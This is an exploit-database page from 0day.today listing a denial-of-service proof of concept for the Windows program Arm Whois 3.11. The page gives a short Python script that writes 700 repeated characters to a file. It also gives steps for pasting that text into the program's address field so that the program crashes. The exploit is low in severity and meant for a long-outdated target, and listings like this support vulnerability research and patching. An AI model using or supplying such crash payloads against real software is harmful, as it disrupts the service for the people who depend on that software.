[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Arm Whois 3.11 - Denial of Service Exploit

Author
Yair Rodríguez Aparicio
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31510
Category
dos / poc
Date add
01-11-2018
Platform
windows
# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86 
 
# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!
 
buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2024-09-28]  #